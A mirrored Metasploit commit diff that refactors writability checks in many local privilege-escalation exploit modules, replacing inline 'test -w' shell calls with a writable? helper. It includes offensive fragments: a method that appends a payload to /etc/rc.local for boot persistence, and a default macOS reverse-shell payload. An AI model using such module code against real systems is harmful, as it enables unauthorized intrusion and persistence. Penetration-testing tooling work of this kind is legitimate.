mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-09 04:26:11 +02:00
Use writable? method for local modules
This commit is contained in:
parent
92dec1ecf8
commit
c3080d69f2
@ -176,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -172,7 +172,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -50,11 +50,13 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
'Privileged' => true
|
||||
}
|
||||
))
|
||||
register_options([
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
|
||||
register_options [
|
||||
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]),
|
||||
OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 120 ])
|
||||
])
|
||||
]
|
||||
register_advanced_options [
|
||||
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
|
||||
]
|
||||
end
|
||||
|
||||
def check
|
||||
|
@ -185,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -169,7 +169,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -165,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -36,22 +36,22 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless cmd_exec("test -w '/etc/rc.local' && echo true").include? 'true'
|
||||
fail_with Failure::BadConfig, '/etc/rc.local is not writable'
|
||||
rc_path = '/etc/rc.local'
|
||||
|
||||
unless writable? rc_path
|
||||
fail_with Failure::BadConfig, "#{rc_path} is not writable"
|
||||
end
|
||||
|
||||
print_status('Reading /etc/rc.local')
|
||||
print_status "Reading #{rc_path}"
|
||||
|
||||
# read /etc/rc.local, but remove `exit 0`
|
||||
rc_local = read_file('/etc/rc.local').gsub(/^exit.*$/, '')
|
||||
rc_local = read_file(rc_path).gsub(/^exit.*$/, '')
|
||||
|
||||
# add payload and put back `exit 0`
|
||||
rc_local << "\n#{payload.encoded}\nexit 0\n"
|
||||
|
||||
# write new file
|
||||
print_status('Patching /etc/rc.local')
|
||||
write_file('/etc/rc.local', rc_local)
|
||||
print_status "Patching #{rc_path}"
|
||||
write_file(rc_path, rc_local)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
@ -158,7 +158,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -149,7 +149,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::NotVulnerable, 'Target not vulnerable! punt!'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -140,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -169,7 +169,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::OSX::Priv
|
||||
include Msf::Post::OSX::System
|
||||
include Msf::Exploit::EXE
|
||||
@ -43,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/shell_reverse_tcp' }
|
||||
))
|
||||
|
||||
register_options [
|
||||
register_advanced_options [
|
||||
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
|
||||
]
|
||||
end
|
||||
@ -65,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::OSX::Priv
|
||||
include Msf::Post::OSX::System
|
||||
include Msf::Exploit::EXE
|
||||
@ -52,7 +53,9 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
))
|
||||
|
||||
register_options [
|
||||
OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python']),
|
||||
OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python'])
|
||||
]
|
||||
register_advanced_options [
|
||||
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
|
||||
]
|
||||
end
|
||||
@ -78,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::OSX::Priv
|
||||
include Msf::Post::OSX::System
|
||||
include Msf::Exploit::EXE
|
||||
@ -74,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::OSX::Priv
|
||||
include Msf::Post::OSX::System
|
||||
include Msf::Exploit::EXE
|
||||
@ -58,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -6,6 +6,7 @@
|
||||
class MetasploitModule < Msf::Exploit::Local
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Post::File
|
||||
include Msf::Post::OSX::Priv
|
||||
include Msf::Post::OSX::System
|
||||
include Msf::Exploit::EXE
|
||||
@ -39,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options [
|
||||
register_advanced_options [
|
||||
OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
|
||||
]
|
||||
end
|
||||
@ -61,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -54,9 +54,11 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
))
|
||||
|
||||
register_options [
|
||||
OptString.new('WritableDir', [true, 'Writable directory', '/tmp']),
|
||||
OptString.new('VMWARE_PATH', [true, "The path to VMware.app", '/Applications/VMware Fusion.app']),
|
||||
]
|
||||
register_advanced_options [
|
||||
OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
|
||||
]
|
||||
end
|
||||
|
||||
def base_dir
|
||||
@ -90,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
|
||||
end
|
||||
|
||||
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
|
@ -43,10 +43,6 @@ class MetasploitModule < Msf::Post
|
||||
datastore['PASSWORD'].to_s
|
||||
end
|
||||
|
||||
def is_writable?(path)
|
||||
cmd_exec("test -w '#{path}' && echo true").include? 'true'
|
||||
end
|
||||
|
||||
def is_executable?(path)
|
||||
cmd_exec("test -x '#{path}' && echo true").include? 'true'
|
||||
end
|
||||
@ -84,11 +80,11 @@ class MetasploitModule < Msf::Post
|
||||
base_name = File.basename cmd
|
||||
|
||||
if file_exist? cmd
|
||||
if is_writable? cmd
|
||||
if writable? cmd
|
||||
print_good "#{cmd} is writable!"
|
||||
return true
|
||||
end
|
||||
elsif is_writable? base_dir
|
||||
elsif writable? base_dir
|
||||
print_good "#{cmd} does not exist and #{base_dir} is writable!"
|
||||
return true
|
||||
end
|
||||
|
Loading…
Reference in New Issue
Block a user